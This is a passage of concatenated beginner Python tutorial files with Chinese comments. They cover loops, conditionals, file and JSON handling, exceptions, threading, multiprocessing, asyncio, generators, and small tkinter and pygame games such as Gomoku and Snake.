% (man_id, pkg)) sleep(0.5) def package_center(deliver_man, max_per_day): num = 1 # 创建状态(GEN_CREATED) - 等待开始执行 print(getgeneratorstate(deliver_man)) deliver_man.send(None) # 挂起状态(GEN_SUSPENDED) - 在yield表达式处暂停 print(getgeneratorstate(deliver_man)) # next(deliver_man) while num <= max_per_day: package_id = 'PKG-%d' % num deliver_man.send(package_id) num += 1 deliver_man.close() # 结束状态(GEN_CLOSED) - 执行完毕 print(getgeneratorstate(deliver_man)) print('今天的包裹派送完毕!') dm = build_deliver_man(1) package_center(dm, 10) File: Day01-15/code/Day13/multiprocess3.py """ 创建进程调用其他程序 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import subprocess import sys def main(): # 通过sys.argv获取命令行参数 if len(sys.argv) > 1: # 第一个命令行参数是程序本身所以从第二个开始取 for index in range(1, len(sys.argv)): try: # 通过subprocess模块的call函数启动子进程 status = subprocess.call(sys.argv[index]) except FileNotFoundError: print('不能执行%s命令' % sys.argv[index]) else: print('请使用命令行参数指定要执行的进程') if __name__ == '__main__': main() File: Day01-15/code/Day13/test3.py from random import randint from threading import Thread from time import sleep import pygame class Color(object): BLACK = (0, 0, 0) WHITE = (255, 255, 255) GRAY = (242, 242, 242) @staticmethod def random_color(): r = randint(0, 255) g = randint(0, 255) b = randint(0, 255) return r, g, b class Car(object): def __init__(self, x, y, color): self._x = x self._y = y self._color = color def move(self): if self._x + 80 < 950: self._x += randint(1, 10) def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, 80, 40), 0) def main(): class BackgroundTask(Thread): def run(self): while True: screen.fill(Color.GRAY) pygame.draw.line(screen, Color.BLACK, (130, 0), (130, 600), 4) pygame.draw.line(screen, Color.BLACK, (950, 0), (950, 600), 4) for car in cars: car.draw(screen) pygame.display.flip() sleep(0.05) for car in cars: car.move() cars = [] for index in range(5): temp = Car(50, 50 + 120 * index, Color.random_color()) cars.append(temp) pygame.init() screen = pygame.display.set_mode((1000, 600)) BackgroundTask(daemon=True).start() running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio3.py """ 异步I/O操作 - asyncio模块 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio async def wget(host): print('wget %s...' 
% host) connect = asyncio.open_connection(host, 80) # 异步方式等待连接结果 reader, writer = await connect header = 'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' % host writer.write(header.encode('utf-8')) # 异步I/O方式执行写操作 await writer.drain() while True: # 异步I/O方式执行读操作 line = await reader.readline() if line == b'\r\n': break print('%s header > %s' % (host, line.decode('utf-8').rstrip())) writer.close() loop = asyncio.get_event_loop() # 通过生成式语法创建一个装了三个协程的列表 hosts_list = ['www.sina.com.cn', 'www.sohu.com', 'www.163.com'] tasks = [wget(host) for host in hosts_list] # 下面的方法将异步I/O操作放入EventLoop直到执行完毕 loop.run_until_complete(asyncio.wait(tasks)) loop.close() File: Day01-15/code/Day13/multiprocess2.py """ 实现进程间的通信 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import multiprocessing import os def sub_task(queue): print('子进程进程号:', os.getpid()) counter = 0 while counter < 1000: queue.put('Pong') counter += 1 if __name__ == '__main__': print('当前进程号:', os.getpid()) queue = multiprocessing.Queue() p = multiprocessing.Process(target=sub_task, args=(queue,)) p.start() counter = 0 while counter < 1000: queue.put('Ping') counter += 1 p.join() print('子任务已经完成.') for _ in range(2000): print(queue.get(), end='') File: Day01-15/code/Day13/multithread2.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from threading import Thread from time import time, sleep def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) sleep(time_to_download) print('%s下载完成! 耗费了%d秒' % (filename, time_to_download)) def main(): start = time() thread1 = Thread(target=download_task, args=('Python从入门到住院.pdf',)) thread1.start() thread2 = Thread(target=download_task, args=('Peking Hot.avi',)) thread2.start() thread1.join() thread2.join() end = time() print('总共耗费了%.3f秒' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/generator2.py """ 生成器 - 使用yield关键字 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ def fib(num): n, a, b = 0, 0, 1 while n < num: yield b a, b = b, a + b n += 1 for x in fib(20): print(x) File: Day01-15/code/Day13/multithread6.py """ 多个线程共享数据 - 有锁的情况 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import threading class Account(object): def __init__(self): self._balance = 0 self._lock = threading.Lock() def deposit(self, money): # 获得锁后代码才能继续执行 self._lock.acquire() try: new_balance = self._balance + money time.sleep(0.01) self._balance = new_balance finally: # 操作完成后一定要记着释放锁 self._lock.release() @property def balance(self): return self._balance if __name__ == '__main__': account = Account() # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): threading.Thread(target=account.deposit, args=(1,)).start() # 等所有存款的线程都执行完毕 time.sleep(2) print('账户余额为: ¥%d元' % account.balance) # 想一想结果为什么不是我们期望的100元 File: Day01-15/code/Day13/singlethread2.py """ 不使用多线程的情况 - 耗时间的任务阻塞主事件循环 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import tkinter import tkinter.messagebox def download(): # 模拟下载任务需要花费10秒钟时间 time.sleep(10) tkinter.messagebox.showinfo('提示', '下载完成!') def show_about(): tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)') def main(): top = tkinter.Tk() top.title('单线程') top.geometry('200x150') top.wm_attributes('-topmost', True) panel = tkinter.Frame(top) button1 = tkinter.Button(panel, text='下载', command=download) button1.pack(side='left') button2 = tkinter.Button(panel, text='关于', command=show_about) button2.pack(side='right') panel.pack(side='bottom') tkinter.mainloop() if __name__ == '__main__': main() # 在不使用多线程的情况下 一旦点击下载按钮 由于该操作需要花费10秒中的时间 # 
整个主消息循环也会被阻塞10秒钟无法响应其他的事件 # 事实上 对于没有因果关系的子任务 这种顺序执行的方式并不合理 File: Day01-15/code/Day13/multithread3.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep import threading class DownloadTask(threading.Thread): def __init__(self, filename): super().__init__() self._filename = filename def run(self): print('开始下载%s...' % self._filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % self._filename) def main(): start = time() # 将多个下载任务放到多个线程中执行 # 通过自定义的线程类创建线程对象 线程启动后会回调执行run方法 thread1 = DownloadTask('Python从入门到住院.pdf') thread1.start() thread2 = DownloadTask('Peking Hot.avi') thread2.start() thread1.join() thread2.join() end = time() print('总共耗费了%.3f秒' % (end - start)) if __name__ == '__main__': main() # 请注意通过threading.Thread创建的线程默认是非守护线程 File: Day01-15/code/Day04/for2.py """ 用for循环实现1~100之间的偶数求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 for x in range(2, 101, 2): sum += x print(sum) File: Day01-15/code/Day04/for6.py """ 打印各种三角形图案 * ** *** **** ***** * ** *** **** ***** * *** ***** ******* ********* Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ row = int(input('请输入行数: ')) for i in range(row): for _ in range(i + 1): print('*', end='') print() for i in range(row): for j in range(row): if j < row - i - 1: print(' ', end='') else: print('*', end='') print() for i in range(row): for _ in range(row - i - 1): print(' ', end='') for _ in range(2 * i + 1): print('*', end='') print() File: Day01-15/code/Day04/while1.py """ 用while循环实现1~100求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 num = 1 while num <= 100: sum += num num += 1 print(sum) File: Day01-15/code/Day04/for3.py """ 输入非负整数n计算n! Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ n = int(input('n = ')) result = 1 for x in range(1, n + 1): result *= x print('%d! 
= %d' % (n, result)) File: Day01-15/code/Day04/while2.py """ 用while循环实现1~100之间的偶数求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum, num = 0, 2 while num <= 100: sum += num num += 2 print(sum) File: Day01-15/code/Day04/for4.py """ 输入一个正整数判断它是不是素数 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ from math import sqrt num = int(input('请输入一个正整数: ')) end = int(sqrt(num)) is_prime = True for x in range(2, end + 1): if num % x == 0: is_prime = False break if is_prime and num != 1: print('%d是素数' % num) else: print('%d不是素数' % num) File: Day01-15/code/Day04/for1.py """ 用for循环实现1~100求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 for x in range(1, 101): sum += x print(sum) File: Day01-15/code/Day04/for5.py """ 输入两个正整数计算最大公约数和最小公倍数 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ x = int(input('x = ')) y = int(input('y = ')) if x > y: (x, y) = (y, x) for factor in range(x, 0, -1): if x % factor == 0 and y % factor == 0: print('%d和%d的最大公约数是%d' % (x, y, factor)) print('%d和%d的最小公倍数是%d' % (x, y, x * y // factor)) break File: Day01-15/code/Day03/tax.py """ 输入月收入和五险一金计算个人所得税 说明:写这段代码时新的个人所得税计算方式还没有颁布 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ salary = float(input('本月收入: ')) insurance = float(input('五险一金: ')) diff = salary - insurance - 3500 if diff <= 0: rate = 0 deduction = 0 elif diff < 1500: rate = 0.03 deduction = 0 elif diff < 4500: rate = 0.1 deduction = 105 elif diff < 9000: rate = 0.2 deduction = 555 elif diff < 35000: rate = 0.25 deduction = 1005 elif diff < 55000: rate = 0.3 deduction = 2755 elif diff < 80000: rate = 0.35 deduction = 5505 else: rate = 0.45 deduction = 13505 tax = abs(diff * rate - deduction) print('个人所得税: ¥%.2f元' % tax) print('实际到手收入: ¥%.2f元' % (diff + 3500 - tax)) File: Day01-15/code/Day03/conversion.py """ 英制单位英寸和公制单位厘米互换 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ value = float(input('请输入长度: ')) unit = input('请输入单位: ') if unit == 'in' or unit == '英寸': print('%f英寸 = %f厘米' % (value, value * 2.54)) elif unit == 'cm' or unit == '厘米': print('%f厘米 = %f英寸' % (value, value / 2.54)) else: print('请输入有效的单位') File: Day01-15/code/Day03/rolldice.py """ 掷骰子决定做什么事情 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ from random import randint face = randint(1, 6) if face == 1: result = '唱首歌' elif face == 2: result = '跳个舞' elif face == 3: result = '学狗叫' elif face == 4: result = '做俯卧撑' elif face == 5: result = '念绕口令' else: result = '讲冷笑话' print(result) File: Day01-15/code/Day03/triangle.py """ 判断输入的边长能否构成三角形 如果能则计算出三角形的周长和面积 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ import math a = float(input('a = ')) b = float(input('b = ')) c = float(input('c = ')) if a + b > c and a + c > b and b + c > a: print('周长: %f' % (a + b + c)) p = (a + b + c) / 2 area = math.sqrt(p * (p - a) * (p - b) * (p - c)) print('面积: %f' % (area)) else: print('不能构成三角形') File: Day01-15/code/Day03/verify.py """ 用户身份验证 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ # import getpass # from getpass import getpass # from getpass import * username = input('请输入用户名: ') password = input('请输入口令: ') # 输入口令的时候终端中没有回显 # password = getpass.getpass('请输入口令: ') if username == 'admin' and password == '123456': print('身份验证成功!') else: print('身份验证失败!') File: Day01-15/code/Day03/piecewise.py """ 分段函数求值 3x - 5 (x > 1) f(x) = x + 2 (-1 <= x <= 1) 5x + 3 (x < -1) Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ x = float(input('x = ')) if x > 1: y = 3 * x - 5 elif x >= -1: y = x + 2 else: y = 5 * x + 3 print('f(%.2f) = %.2f' % (x, y)) File: Day01-15/code/Day03/grade.py """ 百分制成绩转等级制成绩 90分以上,输出A 80分~89分,输出B 70分~79分,输出C 60分~69分,输出D 60分以下,输出E Version: 0.1 
Author: 骆昊 Date: 2018-02-28 """ score = float(input('请输入成绩: ')) if score >= 90: grade = 'A' elif score >= 80: grade = 'B' elif score >= 70: grade = 'C' elif score >= 60: grade = 'D' else: grade = 'E' print('对应的等级是:', grade) File: Day01-15/code/Day02/variable2.py """ 将input函数输入的数据保存在变量中并进行操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = int(input('a = ')) b = int(input('b = ')) print(a + b) print(a - b) print(a * b) print(a / b) print(a // b) print(a % b) print(a ** b) File: Day01-15/code/Day02/leap.py """ 输入年份 如果是闰年输出True 否则输出False Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ year = int(input('请输入年份: ')) # 如果代码太长写成一行不便于阅读 可以使用\或()折行 is_leap = (year % 4 == 0 and year % 100 != 0 or year % 400 == 0) print(is_leap) File: Day01-15/code/Day02/variable3.py """ 格式化输出 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = int(input('a = ')) b = int(input('b = ')) print('%d + %d = %d' % (a, b, a + b)) print('%d - %d = %d' % (a, b, a - b)) print('%d * %d = %d' % (a, b, a * b)) print('%d / %d = %f' % (a, b, a / b)) print('%d // %d = %d' % (a, b, a // b)) print('%d %% %d = %d' % (a, b, a % b)) print('%d ** %d = %d' % (a, b, a ** b)) File: Day01-15/code/Day02/circle.py """ 输入半径计算圆的周长和面积 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ import math radius = float(input('请输入圆的半径: ')) perimeter = 2 * math.pi * radius area = math.pi * radius * radius print('周长: %.2f' % perimeter) print('面积: %.2f' % area) File: Day01-15/code/Day02/operator.py """ 运算符的使用 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 5 b = 10 c = 3 d = 4 e = 5 a += b a -= c a *= d a /= e print("a = ", a) flag1 = 3 > 2 flag2 = 2 < 1 flag3 = flag1 and flag2 flag4 = flag1 or flag2 flag5 = not flag1 print("flag1 = ", flag1) print("flag2 = ", flag2) print("flag3 = ", flag3) print("flag4 = ", flag4) print("flag5 = ", flag5) print(flag1 is True) print(flag2 is not False) File: Day01-15/code/Day02/centigrade.py """ 将华氏温度转换为摄氏温度 F = 1.8C + 32 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ f = float(input('请输入华氏温度: ')) c = (f - 32) / 1.8 print('%.1f华氏度 = %.1f摄氏度' % (f, c)) File: Day01-15/code/Day02/variable4.py """ 检查变量的类型 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 100 b = 1000000000000000000 c = 12.345 d = 1 + 5j e = 'A' f = 'hello, world' g = True print(type(a)) print(type(b)) print(type(c)) print(type(d)) print(type(e)) print(type(f)) print(type(g)) File: Day01-15/code/Day02/variable5.py """ 类型转换 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 100 b = str(a) c = 12.345 d = str(c) e = '123' f = int(e) g = '123.456' h = float(g) i = False j = str(i) k = 'hello' m = bool(k) print(a) print(type(a)) print(b) print(type(b)) print(c) print(type(c)) print(d) print(type(d)) print(e) print(type(e)) print(f) print(type(f)) print(g) print(type(g)) print(h) print(type(h)) print(i) print(type(i)) print(j) print(type(j)) print(k) print(type(k)) print(m) print(type(m)) File: Day01-15/code/Day02/strings.py """ 字符串常用操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ str1 = 'hello, world!' 
print('字符串的长度是:', len(str1)) print('单词首字母大写: ', str1.title()) print('字符串变大写: ', str1.upper()) # str1 = str1.upper() print('字符串是不是大写: ', str1.isupper()) print('字符串是不是以hello开头: ', str1.startswith('hello')) print('字符串是不是以hello结尾: ', str1.endswith('hello')) print('字符串是不是以感叹号开头: ', str1.startswith('!')) print('字符串是不是一感叹号结尾: ', str1.endswith('!')) str2 = '- \u9a86\u660a' str3 = str1.title() + ' ' + str2.lower() print(str3) File: Day01-15/code/Day02/variable1.py """ 使用变量保存数据并进行操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 321 b = 123 print(a + b) print(a - b) print(a * b) print(a / b) print(a // b) print(a % b) print(a ** b) File: Day01-15/code/Day05/prime.py """ 输出2~99之间的素数 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import math for num in range(2, 100): is_prime = True for factor in range(2, int(math.sqrt(num)) + 1): if num % factor == 0: is_prime = False break if is_prime: print(num, end=' ') File: Day01-15/code/Day05/palindrome.py """ 判断输入的正整数是不是回文数 回文数是指将一个正整数从左往右排列和从右往左排列值一样的数 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ num = int(input('请输入一个正整数: ')) temp = num num2 = 0 while temp > 0: num2 *= 10 num2 += temp % 10 temp //= 10 if num == num2: print('%d是回文数' % num) else: print('%d不是回文数' % num) File: Day01-15/code/Day05/guess.py """ 猜数字游戏 计算机出一个1~100之间的随机数由人来猜 计算机根据人猜的数字分别给出提示大一点/小一点/猜对了 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import random answer = random.randint(1, 100) counter = 0 while True: counter += 1 number = int(input('请输入: ')) if number < answer: print('大一点') elif number > answer: print('小一点') else: print('恭喜你猜对了!') break print('你总共猜了%d次' % counter) if counter > 7: print('你的智商余额明显不足') File: Day01-15/code/Day05/lily.py """ 找出100~999之间的所有水仙花数 水仙花数是各位立方和等于这个数本身的数 如: 153 = 1**3 + 5**3 + 3**3 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for num in range(100, 1000): low = num % 10 mid = num // 10 % 10 high = num // 100 if num == low ** 3 + mid ** 3 + high ** 3: print(num) File: Day01-15/code/Day05/perfect.py """ 找出1~9999之间的所有完美数 完美数是除自身外其他所有因子的和正好等于这个数本身的数 例如: 6 = 1 + 2 + 3, 28 = 1 + 2 + 4 + 7 + 14 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import math for num in range(2, 10000): result = 0 for factor in range(1, int(math.sqrt(num)) + 1): if num % factor == 0: result += factor if factor > 1 and num // factor != factor: result += num // factor if result == num: print(num) File: Day01-15/code/Day05/table.py """ 输出乘法口诀表(九九表) Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for i in range(1, 10): for j in range(1, i + 1): print('%d*%d=%d' % (i, j, i * j), end='\t') print() File: Day01-15/code/Day05/craps.py """ Craps赌博游戏 玩家摇两颗色子 如果第一次摇出7点或11点 玩家胜 如果摇出2点 3点 12点 庄家胜 其他情况游戏继续 玩家再次要色子 如果摇出7点 庄家胜 如果摇出第一次摇的点数 玩家胜 否则游戏继续 玩家继续摇色子 玩家进入游戏时有1000元的赌注 全部输光游戏结束 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ from random import randint money = 1000 while money > 0: print('你的总资产为:', money) needs_go_on = False while True: debt = int(input('请下注: ')) if 0 < debt <= money: break first = randint(1, 6) + randint(1, 6) print('玩家摇出了%d点' % first) if first == 7 or first == 11: print('玩家胜!') money += debt elif first == 2 or first == 3 or first == 12: print('庄家胜!') money -= debt else: needs_go_on = True while needs_go_on: current = randint(1, 6) + randint(1, 6) print('玩家摇出了%d点' % current) if current == 7: print('庄家胜') money -= debt needs_go_on = False elif current == first: print('玩家胜') money += debt needs_go_on = False print('你破产了, 游戏结束!') File: Day01-15/code/Day05/chicken.py """ 求解《百钱百鸡》问题 1只公鸡5元 1只母鸡3元 3只小鸡1元 用100元买100只鸡 问公鸡 母鸡 小鸡各有多少只 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for x in range(0, 20): for y 
in range(0, 33): z = 100 - x - y if 5 * x + 3 * y + z / 3 == 100: print('公鸡: %d只, 母鸡: %d只, 小鸡: %d只' % (x, y, z)) File: Day01-15/code/Day05/fibonacci.py """ 输出斐波那契数列的前20个数 1 1 2 3 5 8 13 21 ... Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ a = 0 b = 1 for _ in range(20): a, b = b, a + b print(a, end=' ') File: Day01-15/code/Day11/csv1.py """ 读取CSV文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import csv filename = 'example.csv' try: with open(filename) as f: reader = csv.reader(f) data = list(reader) except FileNotFoundError: print('无法打开文件:', filename) else: for item in data: print('%-30s%-20s%-10s' % (item[0], item[1], item[2])) File: Day01-15/code/Day11/json2.py """ 写入JSON文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import json teacher_dict = {'name': '白元芳', 'age': 25, 'title': '讲师'} json_str = json.dumps(teacher_dict) print(json_str) print(type(json_str)) fruits_list = ['apple', 'orange', 'strawberry', 'banana', 'pitaya'] json_str = json.dumps(fruits_list) print(json_str) print(type(json_str)) File: Day01-15/code/Day11/file2.py """ 读取圆周率文件判断其中是否包含自己的生日 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ birth = input('请输入你的生日: ') with open('pi_million_digits.txt') as f: lines = f.readlines() pi_string = '' for line in lines: pi_string += line.strip() if birth in pi_string: print('Bingo!!!') File: Day01-15/code/Day11/ex2.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ input_again = True while input_again: try: a = int(input('a = ')) b = int(input('b = ')) print('%d / %d = %f' % (a, b, a / b)) input_again = False except (ValueError, ZeroDivisionError) as msg: print(msg) File: Day01-15/code/Day11/ex3.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import time import sys filename = input('请输入文件名: ') try: with open(filename) as f: lines = f.readlines() except FileNotFoundError as msg: print('无法打开文件:', filename) print(msg) except UnicodeDecodeError as msg: print('非文本文件无法解码') sys.exit() else: for line in lines: print(line.rstrip()) time.sleep(0.5) finally: # 此处最适合做善后工作 print('不管发生什么我都会执行') File: Day01-15/code/Day11/file3.py """ 写文本文件 将100以内的素数写入到文件中 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ from math import sqrt def is_prime(n): for factor in range(2, int(sqrt(n)) + 1): if n % factor == 0: return False return True # 试一试有什么不一样 # with open('prime.txt', 'a') as f: with open('prime.txt', 'w') as f: for num in range(2, 100): if is_prime(num): f.write(str(num) + '\n') print('写入完成!') File: Day01-15/code/Day11/file4.py """ 读写二进制文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import base64 with open('mm.jpg', 'rb') as f: data = f.read() # print(type(data)) # print(data) print('字节数:', len(data)) # 将图片处理成BASE-64编码 print(base64.b64encode(data)) with open('girl.jpg', 'wb') as f: f.write(data) print('写入完成!') File: Day01-15/code/Day11/ex4.py """ 引发异常和异常栈 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ def f1(): raise AssertionError('发生异常') def f2(): f1() def f3(): f2() f3() File: Day01-15/code/Day11/file1.py """ 从文本文件中读取数据 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import time def main(): # 一次性读取整个文件内容 with open('致橡树.txt', 'r', encoding='utf-8') as f: print(f.read()) # 通过for-in循环逐行读取 with open('致橡树.txt', mode='r') as f: for line in f: print(line, end='') time.sleep(0.5) print() # 读取文件按行读取到列表中 with open('致橡树.txt') as f: lines = f.readlines() print(lines) if __name__ == '__main__': main() File: Day01-15/code/Day11/ex1.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ input_again = True while input_again: try: a = int(input('a = ')) b = 
int(input('b = ')) print('%d / %d = %f' % (a, b, a / b)) input_again = False except ValueError: print('请输入整数') except ZeroDivisionError: print('除数不能为0') # 处理异常让代码不因异常而崩溃是一方面 # 更重要的是可以通过对异常的处理让代码从异常中恢复过来 File: Day01-15/code/Day11/json1.py """ 读取JSON数据 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import json import csv2 json_str = '{"name": "骆昊", "age": 38, "title": "叫兽"}' result = json.loads(json_str) print(result) print(type(result)) print(result['name']) print(result['age']) # 把转换得到的字典作为关键字参数传入Teacher的构造器 teacher = csv2.Teacher(**result) print(teacher) print(teacher.name) print(teacher.age) print(teacher.title) # 请思考如何将下面JSON格式的天气数据转换成对象并获取我们需要的信息 # 稍后我们会讲解如何通过网络API获取我们需要的JSON格式的数据 """ { "wendu": "29", "ganmao": "各项气象条件适宜,发生感冒机率较低。但请避免长期处于空调房间中,以防感冒。", "forecast": [ { "fengxiang": "南风", "fengli": "3-4级", "high": "高温 32℃", "type": "多云", "low": "低温 17℃", "date": "16日星期二" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 34℃", "type": "晴", "low": "低温 19℃", "date": "17日星期三" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 35℃", "type": "晴", "low": "低温 22℃", "date": "18日星期四" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 35℃", "type": "多云", "low": "低温 22℃", "date": "19日星期五" }, { "fengxiang": "南风", "fengli": "3-4级", "high": "高温 34℃", "type": "晴", "low": "低温 21℃", "date": "20日星期六" } ], "yesterday": { "fl": "微风", "fx": "南风", "high": "高温 28℃", "type": "晴", "low": "低温 15℃", "date": "15日星期一" }, "aqi": "72", "city": "北京" } """ File: Day01-15/code/Day11/csv2.py """ 写入CSV文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import csv class Teacher(object): def __init__(self, name, age, title): self.__name = name self.__age = age self.__title = title self.__index = -1 @property def name(self): return self.__name @property def age(self): return self.__age @property def title(self): return self.__title filename = 'teacher.csv' teachers = [Teacher('骆昊', 38, '叫兽'), Teacher('狄仁杰', 25, '砖家')] try: with open(filename, 'w') as f: writer = csv.writer(f) for teacher in teachers: writer.writerow([teacher.name, teacher.age, teacher.title]) except BaseException as e: print('无法写入文件:', filename) else: print('保存数据完成!') File: Day01-15/code/Day10/renju.py import pygame EMPTY = 0 BLACK = 1 WHITE = 2 black_color = [0, 0, 0] white_color = [255, 255, 255] class RenjuBoard(object): def __init__(self): self._board = [[]] * 15 self.reset() def reset(self): for row in range(len(self._board)): self._board[row] = [EMPTY] * 15 def move(self, row, col, is_black): if self._board[row][col] == EMPTY: self._board[row][col] = BLACK if is_black else WHITE return True return False def draw(self, screen): for index in range(1, 16): pygame.draw.line(screen, black_color, [40, 40 * index], [600, 40 * index], 1) pygame.draw.line(screen, black_color, [40 * index, 40], [40 * index, 600], 1) pygame.draw.rect(screen, black_color, [36, 36, 568, 568], 4) pygame.draw.circle(screen, black_color, [320, 320], 5, 0) pygame.draw.circle(screen, black_color, [160, 160], 5, 0) pygame.draw.circle(screen, black_color, [480, 480], 5, 0) pygame.draw.circle(screen, black_color, [480, 160], 5, 0) pygame.draw.circle(screen, black_color, [160, 480], 5, 0) for row in range(len(self._board)): for col in range(len(self._board[row])): if self._board[row][col] != EMPTY: ccolor = black_color \ if self._board[row][col] == BLACK else white_color pos = [40 * (col + 1), 40 * (row + 1)] pygame.draw.circle(screen, ccolor, pos, 20, 0) def main(): board = RenjuBoard() is_black = True pygame.init() pygame.display.set_caption('五子棋') screen = pygame.display.set_mode([640, 
640]) screen.fill([255, 255, 0]) board.draw(screen) pygame.display.flip() running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False elif event.type == pygame.KEYUP: pass elif event.type == pygame.MOUSEBUTTONDOWN\ and event.button == 1: x, y = event.pos row = round((y - 40) / 40) col = round((x - 40) / 40) if board.move(row, col, is_black): is_black = not is_black screen.fill([255, 255, 0]) board.draw(screen) pygame.display.flip() pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day10/gui2.py """ 使用tkinter创建GUI - 使用画布绘图 - 处理鼠标事件 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter def mouse_evt_handler(evt=None): row = round((evt.y - 20) / 40) col = round((evt.x - 20) / 40) pos_x = 40 * col pos_y = 40 * row canvas.create_oval(pos_x, pos_y, 40 + pos_x, 40 + pos_y, fill='black') top = tkinter.Tk() # 设置窗口尺寸 top.geometry('620x620') # 设置窗口标题 top.title('五子棋') # 设置窗口大小不可改变 top.resizable(False, False) # 设置窗口置顶 top.wm_attributes('-topmost', 1) canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0) canvas.bind('<Button-1>', mouse_evt_handler) canvas.create_rectangle(0, 0, 600, 600, fill='yellow', outline='white') for index in range(15): canvas.create_line(20, 20 + 40 * index, 580, 20 + 40 * index, fill='black') canvas.create_line(20 + 40 * index, 20, 20 + 40 * index, 580, fill='black') canvas.create_rectangle(15, 15, 585, 585, outline='black', width=4) canvas.pack() tkinter.mainloop() # 请思考如何用面向对象的编程思想对上面的代码进行封装 File: Day01-15/code/Day10/snake.py from abc import ABCMeta, abstractmethod from enum import Enum, unique from random import randrange from threading import Thread import pygame class Color(object): """颜色""" GRAY = (242, 242, 242) BLACK = (0, 0, 0) GREEN = (0, 255, 0) PINK = (255, 20, 147) @unique class Direction(Enum): """方向""" UP = 0 RIGHT = 1 DOWN = 2 LEFT = 3 class GameObject(object, metaclass=ABCMeta): """游戏中的对象""" def __init__(self, x=0, y=0, color=Color.BLACK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param color: 颜色 """ self._x = x self._y = y self._color = color @property def x(self): return self._x @property def y(self): return self._y @abstractmethod def draw(self, screen): """ 绘制 :param screen: 屏幕 """ pass class Wall(GameObject): """围墙""" def __init__(self, x, y, width, height, color=Color.BLACK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param width: 宽度 :param height: 高度 :param color: 颜色 """ super().__init__(x, y, color) self._width = width self._height = height @property def width(self): return self._width @property def height(self): return self._height def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, self._width, self._height), 4) class Food(GameObject): """食物""" def __init__(self, x, y, size, color=Color.PINK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param color: 颜色 """ super().__init__(x, y, color) self._size = size self._hidden = False def draw(self, screen): if not self._hidden: pygame.draw.circle(screen, self._color, (self._x + self._size // 2, self._y + self._size // 2), self._size // 2, 0) self._hidden = not self._hidden class SnakeNode(GameObject): """蛇身上的节点""" def __init__(self, x, y, size, 